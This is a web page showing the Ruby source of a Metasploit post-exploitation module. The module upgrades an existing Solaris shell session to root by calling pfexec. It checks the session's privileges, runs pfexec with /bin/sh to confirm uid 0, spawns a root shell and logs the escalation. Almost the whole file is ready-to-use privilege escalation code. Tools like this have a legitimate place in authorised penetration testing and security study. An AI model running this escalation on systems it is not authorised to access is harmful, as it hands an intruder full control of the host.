Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/solaris/escalate/pfexec.rb
19722 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::File
8
include Msf::Post::Solaris::System
9
include Msf::Post::Solaris::Priv
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Solaris pfexec Upgrade Shell',
16
'Description' => %q{
17
This module attempts to upgrade a shell session to UID 0 using pfexec.
18
},
19
'License' => MSF_LICENSE,
20
'Author' => ['bcoles'],
21
'Platform' => 'solaris',
22
'References' => [
23
['URL', 'https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html'],
24
['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],
25
['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']
26
],
27
'SessionTypes' => ['shell'],
28
'Notes' => {
29
'Stability' => [CRASH_SAFE],
30
'SideEffects' => [IOC_IN_LOGS],
31
'Reliability' => [REPEATABLE_SESSION]
32
}
33
)
34
)
35
register_options([
36
OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),
37
OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])
38
])
39
end
40
41
def shell_path
42
datastore['SHELL_PATH'].to_s
43
end
44
45
def pfexec_path
46
datastore['PFEXEC_PATH'].to_s
47
end
48
49
def run
50
unless session.type == 'shell'
51
fail_with(Failure::BadConfig, "This module is not compatible with #{session.type} sessions")
52
end
53
54
if is_root?
55
fail_with(Failure::BadConfig, 'Session already has root privileges')
56
end
57
58
unless command_exists?(pfexec_path)
59
fail_with(Failure::NotVulnerable, "#{pfexec_path} does not exist")
60
end
61
62
user = cmd_exec('id -un').to_s
63
64
print_status("Trying pfexec as `#{user}' ...")
65
66
res = cmd_exec("#{pfexec_path} #{shell_path} -c id")
67
vprint_status res
68
69
unless res.include?('uid=0')
70
fail_with(Failure::NotVulnerable, "User `#{user}' does not have permission to escalate with pfexec")
71
end
72
73
print_good('Success! Upgrading session ...')
74
75
cmd_exec("#{pfexec_path} #{shell_path}")
76
77
unless is_root?
78
fail_with(Failure::NotVulnerable, 'Failed to escalate')
79
end
80
81
print_good('Success! root shell secured')
82
report_note(
83
host: session,
84
type: 'host.escalation',
85
data: { :escalation => "User `#{user}' pfexec'ed to a root shell" }
86
)
87
end
88
end
89
90